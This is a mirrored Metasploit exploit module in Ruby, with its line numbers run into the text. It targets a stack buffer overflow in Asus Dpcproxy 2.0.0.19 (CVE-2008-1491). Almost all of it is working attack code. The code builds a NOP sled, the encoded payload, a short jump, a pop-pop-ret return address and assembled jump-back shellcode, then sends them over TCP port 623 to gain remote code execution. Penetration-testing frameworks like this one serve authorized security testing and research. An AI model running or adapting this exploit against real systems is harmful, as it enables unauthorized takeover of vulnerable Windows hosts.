CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Asus Dpcproxy Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.15It should be vulnerable until version 2.0.0.24.16Credit to Luigi Auriemma17},18'Author' => 'Jacopo Cervini',19'References' =>20[21[ 'CVE', '2008-1491' ],22[ 'OSVDB', '43638' ],23[ 'BID', '28394' ],24],25'DefaultOptions' =>26{27'EXITFUNC' => 'process',28},29'Payload' =>30{31'Space' => 400,32'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",33},34'Platform' => 'win',35'Targets' =>36[37[ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r38],39'Privileged' => true,40'DefaultTarget' => 0,41'DisclosureDate' => '2008-03-21'))4243register_options([Opt::RPORT(623)])4445end4647def exploit48connect4950sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)51sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)52sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back53sploit << make_nops(50)5455print_status("Trying target #{target.name}...")56sock.put(sploit)57select(nil,nil,nil,3) # =(5859handler60disconnect61end62end636465